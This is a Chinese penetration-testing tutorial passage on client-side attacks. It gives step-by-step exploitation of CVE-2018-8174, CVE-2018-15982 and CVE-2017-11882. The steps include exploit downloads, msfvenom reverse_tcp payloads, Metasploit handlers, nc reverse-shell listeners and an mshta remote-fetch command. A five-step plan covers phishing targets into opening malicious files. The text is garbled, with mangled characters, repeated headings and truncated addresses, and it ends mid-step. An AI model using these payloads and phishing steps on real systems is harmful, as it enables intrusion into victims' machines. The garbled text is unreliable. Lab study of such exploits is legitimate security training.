第7章-7.2-客戶端滲透

客戶端滲透滲透測(cè)試基于Web應(yīng)用系統(tǒng)的滲透雖然較為常見，但是除了常見的Web系統(tǒng)滲透測(cè)試外，還可以從客戶端方面進(jìn)行滲透測(cè)試攻擊。前言客戶端滲透簡(jiǎn)介IE瀏覽器遠(yuǎn)程代碼執(zhí)行（CVE-2018-8174）AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行（CVE-2018-15982）Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）客戶端滲透應(yīng)用軟件一般有客戶端/服務(wù)端（C/S）模式、瀏覽器/服務(wù)端（B/S）模式、純客戶端模式。普通用戶在主機(jī)系統(tǒng)上運(yùn)行的軟件大部分時(shí)間處于上述模式中客戶端的一方，通過互聯(lián)網(wǎng)主動(dòng)地訪問遠(yuǎn)程服務(wù)端，接收并且處理來自于服務(wù)端的數(shù)據(jù)?？蛻舳藵B透攻擊與上一節(jié)中所述的服務(wù)端滲透攻擊有個(gè)顯著不同的標(biāo)志，就是攻擊者向用戶主機(jī)發(fā)送的惡意數(shù)據(jù)不會(huì)直接導(dǎo)致用戶系統(tǒng)中的服務(wù)進(jìn)程溢出，而是需要結(jié)合一些社會(huì)工程學(xué)技巧，誘使客戶端用戶去訪問或處理這些惡意數(shù)據(jù)，從而間接導(dǎo)致攻擊發(fā)生?？蛻舳藵B透舉例瀏覽器/服務(wù)端模式的攻擊，以常用的IE瀏覽器為例，攻擊者發(fā)送一個(gè)訪問鏈接給用戶，該鏈接指向服務(wù)器上的一個(gè)惡意網(wǎng)頁，用戶訪問該網(wǎng)頁時(shí)觸發(fā)安全漏洞，執(zhí)行內(nèi)嵌在網(wǎng)頁中的惡意代碼，導(dǎo)致攻擊發(fā)生。

純客戶端模式的攻擊，以Adobe、Office為例，攻擊者通過社會(huì)工程學(xué)探測(cè)到目標(biāo)用戶的郵箱、即時(shí)通信賬戶等個(gè)人信息，將惡意文檔發(fā)送給用戶。用戶打開文檔時(shí)觸發(fā)安全漏洞，運(yùn)行其中的惡意代碼，導(dǎo)致攻擊發(fā)生。由此可見，客戶端滲透攻擊與上一節(jié)中所述的服務(wù)端滲透攻擊有個(gè)顯著不同的標(biāo)志，就是攻擊者向用戶主機(jī)發(fā)送的惡意數(shù)據(jù)不會(huì)直接導(dǎo)致用戶系統(tǒng)中的服務(wù)進(jìn)程溢出，而是需要結(jié)合一些社會(huì)工程學(xué)技巧，誘使客戶端用戶去訪問或處理這些惡意數(shù)據(jù)，從而間接導(dǎo)致攻擊發(fā)生。客戶端滲透為什么要進(jìn)行客戶端攻擊？隨著時(shí)代發(fā)展到了今天，在有各種WAF、防火墻的情況下，各種漏洞已經(jīng)很難像過去那么好被利用了，攻擊者想繞過防火墻發(fā)動(dòng)攻擊也不是那么容易的了。而當(dāng)我們發(fā)送一個(gè)釣魚文件到客戶端上，再由客戶端打開這個(gè)文件，最后客戶端穿過防火墻回連到我們，此時(shí)在客戶端上我們就獲得了一個(gè)立足點(diǎn)foothold。這樣的一個(gè)過程是相對(duì)而言是較為容易的，這也是為什么要進(jìn)行客戶端攻擊?？蛻舳藵B透如何獲得客戶端上的立足點(diǎn)？1、盡可能多的了解目標(biāo)環(huán)境，即做好信息收集工作2、創(chuàng)建一個(gè)虛擬機(jī)，使它與目標(biāo)環(huán)境盡可能的一致，比如操作系統(tǒng)、使用的瀏覽器版本等等都需要保證嚴(yán)格一致3、攻擊剛剛創(chuàng)建的虛擬機(jī)，這會(huì)是最好的攻擊目標(biāo)4、精心策劃攻擊方法，達(dá)到使目標(biāo)認(rèn)為這些攻擊行為都是正常行為的效果5、將精心制作的釣魚文件發(fā)送給目標(biāo)，比如釣魚郵件如果這五步都非常細(xì)致精心的去準(zhǔn)備，那么攻擊成功的概率會(huì)大幅提升?？蛻舳藵B透簡(jiǎn)介IE瀏覽器遠(yuǎn)程代碼執(zhí)行（CVE-2018-8174）AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行（CVE-2018-15982）Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）InternetExplorer，是微軟公司推出的一款網(wǎng)頁瀏覽器，用戶量極大。CVE-2018-8174這個(gè)漏洞是WindowsVBScriptEngine代碼執(zhí)行漏洞，由于VBScript腳本執(zhí)行引擎（vbscript.dll）存在代碼執(zhí)行漏洞，攻擊者可以將惡意的VBScript嵌入到office文件或者網(wǎng)站中，一旦用戶不小心打開，遠(yuǎn)程攻擊者可以獲取當(dāng)前用戶權(quán)限執(zhí)行腳本中的惡意代碼。受影響產(chǎn)品：Windows7、WindowsServer2012R2、WindowsRT8.1、WindowsServer2008、WindowsServer2012、Windows8.1、WindowsServer2016、WindowsServer2008R2、Windows10、Windows10Servers。1.下載漏洞利用腳本，下載鏈接：/Yt1g3r/CVE-2018-8174_EXP。IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）2.進(jìn)入CVE-2018-8174_EXP目錄IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）3.使用python腳本生成payload。命令如下：python2CVE-2018-8174.py-u5/exploit.html-oexp.rtf-i5-p4444IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）4.Kali使用nc開啟本地監(jiān)聽，準(zhǔn)備接收反彈shell。IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）5.然后另開一個(gè)終端，使用python開啟Web服務(wù)，端口80。命令如下：python2-mSimpleHTTPServer80IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）6.Win7虛擬機(jī)IE瀏覽器訪問鏈接：5/exploit.html。訪問報(bào)錯(cuò)，但是沒關(guān)系，Kali已經(jīng)獲取反彈shell，攻擊成功。IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）7.Kali已經(jīng)獲取反彈shell，攻擊成功IE瀏覽器遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-8174）客戶端滲透簡(jiǎn)介IE瀏覽器遠(yuǎn)程代碼執(zhí)行（CVE-2018-8174）AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行（CVE-2018-15982）Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）AdobeFlashPlayer是一種廣泛使用的、專有的多媒體程序播放器，它使用矢量圖形的技術(shù)來最小化文件的大小以及創(chuàng)造節(jié)省網(wǎng)絡(luò)帶寬和下載時(shí)間的文件。因此Flash成為嵌入網(wǎng)頁中的小游戲、動(dòng)畫以及圖形用戶界面常用的格式。CVE-2018-15982這個(gè)漏洞可以進(jìn)行遠(yuǎn)程代碼執(zhí)行，攻擊者通過網(wǎng)頁下載、電子郵件、即時(shí)通信等渠道向受害者發(fā)送惡意構(gòu)造的Office文件誘使其打開處理，可能觸發(fā)漏洞在用戶系統(tǒng)上執(zhí)行任意指令獲取控制。受影響產(chǎn)品：AdobeFlashPlayer(53及更早的版本)1.下載漏洞利用腳本，下載鏈接：/Ridter/CVE-2018-15982_EXPAdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）2.進(jìn)入kali用戶的家目錄，然后進(jìn)入CVE-2018-15982_EXP目錄。AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）3.利用msfvenom生成木馬文件86.bin和64.bin，命令如下：msfvenom-pwindows/meterpreter/reverse_tcpLPORT=4444LHOST=5-fraw>86.binmsfvenom-pwindows/meterpreter/reverse_tcpLPORT=4444LHOST=5-fraw>64.binAdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）4.利用下載的腳本生成文件視頻文件exploit.swf和網(wǎng)頁index.html，命令如下：python2CVE_2018_15982.py-i86.bin-I64.binAdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）5.msf中設(shè)置監(jiān)聽，命令如下：useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST5setLPORT4444runAdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）6.然后另開一個(gè)終端，使用python開啟Web服務(wù)，端口80，命令如下：python2-mSimpleHTTPServer80AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）7.Win7虛擬機(jī)IE瀏覽器訪問5/index.html。有時(shí)候ie瀏覽器會(huì)崩潰。AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2018-15982）8.kali中已經(jīng)獲取到shell。客戶端滲透簡(jiǎn)介IE瀏覽器遠(yuǎn)程代碼執(zhí)行（CVE-2018-8174）AdobeFlashPlayer遠(yuǎn)程代碼執(zhí)行（CVE-2018-15982）Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）MicrosoftOffice是由Microsoft（微軟）公司開發(fā)的一套基于Windows操作系統(tǒng)的辦公軟件套裝，常用組件有Word、Excel、PowerPoint等。2017年11月14日，微軟發(fā)布了11月份的安全補(bǔ)丁更新，其中比較引人關(guān)注的莫過于悄然修復(fù)了潛伏17年之久的Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）。該漏洞為Office內(nèi)存破壞漏洞，攻擊者可以利用漏洞以當(dāng)前登錄的用戶的身份執(zhí)行任意命令。漏洞影響版本：Office365、MicrosoftOffice2000、MicrosoftOffice2003、MicrosoftOffice2007ServicePack3、MicrosoftOffice2010ServicePack2、MicrosoftOffice2013ServicePack1、MicrosoftOffice2016。Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）1.漏洞利用腳本，下載鏈接：/Ridter/CVE-2017-11882Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）2.啟動(dòng)msfconsole，使用cve_2017_11882腳本進(jìn)行攻擊，具體命令如下：useexploit/windows/smb/cve_2017_11882setpayloadwindows/meterpreter/reverse_tcpsetlhost5setlport4444seturipathexprunOffice遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）3.然后生成目標(biāo)機(jī)器的漏洞文檔，進(jìn)入CVE-2017-11882目錄，執(zhí)行以下命令：python2Command109b_CVE-2017-11882.py-c"mshta5:8080/exp"-oexp.doc上面的這個(gè)url是msf中生成的惡意文件exp的下載地址。Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）4.然后另開一個(gè)終端，使用python開啟Web服務(wù)，端口80。python2-mSimpleHTTPServer80Office遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2017-11882）5.Win7虛擬機(jī)IE瀏覽器訪問